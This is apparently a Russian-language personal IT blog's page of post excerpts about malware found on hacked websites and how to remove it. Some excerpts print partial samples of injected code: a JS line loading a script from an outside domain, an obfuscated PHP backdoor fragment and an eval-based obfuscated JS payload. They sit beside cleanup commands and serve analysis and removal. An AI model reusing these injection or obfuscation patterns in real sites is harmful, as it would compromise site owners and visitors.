Сибирь. Сабынич. Айти

о природе, личной жизни и информационных технологиях

вирусы

Найден вирус, съедающий интернет-трафик и заряд смартфона

По словам специалистов, каждого владельца Android-устройства должны насторожить нагревание гаджета и быстрое расходование его заряда. Опасными признаками также названы замедление работы или частые перезагрузки устройства и большой объем обработки данных. Источник: Бестеллеры ИТ-рынка Так вот почему андроид тормозит и жрёт батарею! Заметка лишний раз показывает, что: Кастомные прошивки от непонятных вендоров – зло Непонятные “магазины” […]

Мошенники в действии

Решил начать новый год с разбора почтового ящика, где накопилось просто непомерно большое количество непрочитанных писем. На текущий момент уже удалил более тысячи писем и отписался от десятка рассылок, которые никогда и не читал. В основном это были рассылки с различных с сайтов разработчиков, которые предоставляют доступ к бесплатным расширениям и шаблонам к движкам сайтов […]

Заражение js-скриптов

UPD 01.03.2013: Я закрыл возможность комментирования данной записи. Все вопросы по данной теме задавайте на https://ask.sabini.ch. Благодарю за понимание. Сегодня был свиделем следующего внедрения вредосного кода в js-файлы. Путь попадания все тот же – ftp. function g(){ <..часть кода удалено..> var e=new Date <..часть кода удалено..> etTime()+(2592000000)); if(!g()&&windo <..часть когда удалено..> src=”http://mainscript.org/mainscript.js”></script>’);} Не совсем уверен в красивости […]

Вирусы на сайте #3

Продолжаем бесконечную историю. Сегодня день начался с того, что блог перестал открываться по причине того, что хостер убрал InnoDB из поддерживаемых движков сервера баз данных MySQL. Пришлось слить дамп, выполнить команду sed ‘s/InnoDB/MyISAM/g’ old.sql > new.sql и залить обратно =) Сегодня наткнулся на такую прелесть: <?php $md5 = “abe69649a7dbde93d328df6049b55aea”; $wp_salt = array(‘(‘,’t’,’v’,’d’,”i”,”o”,”;”,”b”,’4′,’n’,”a”,”z”,’)’,”c”,”f”,”6″,”r”,”g”,”l”,”e”,”$”,’_’,’s’); $wp_add_filter = create_function(‘$’.’v’,$wp_salt[19].$wp_salt[2].$ […]

Вирусы на сайте. Продолжение. Новый паттерн

Найден новый паттерн. Заражаются все .js-файлы try{q=document.createElement(“d”+”i”+”v”);q.appendChild(q+””);}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz=’al’;zz=’zv’.substr(123-122)+zz;ss=[];f=’fr’+’om’+’Ch’;f+=’arC’;f+=’ode’;w=this;e=w[f[“substr”](11)+zz];n=”19$50$57.5$ <часть кода убрана> 9.5$19$19.5$28.5″[((e)?”s”:””)+”p”+”lit”](“a$”[((e)?”su”:””)+”bstr”](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} Выкусывается командой: find ./ -type f -name “*.js” -exec perl -pi -e ‘s/try\{q=documen.*q=ss;e\(q\)//g”’ ‘{}’ \; Не забываем перед операцией делать резервную копию директории/сайта.

Вирусы на сайте. Поиск и удаление кода.

Тема появления вредоносного кода на страницах сайта очень популярная. Хотел в заголовке добавить “Часть 1”, но потом решил сделать в виде бесконечной истории =) Как уже все должно быть известно, нередко (я бы даже сказал, в большинстве случаев) пользователи сами становятся носителями инфекции (в ботнет-среде таких называют “зомби”). И внедрение кода может происходить следующим способом. […]

Пролистать наверх
Exit mobile version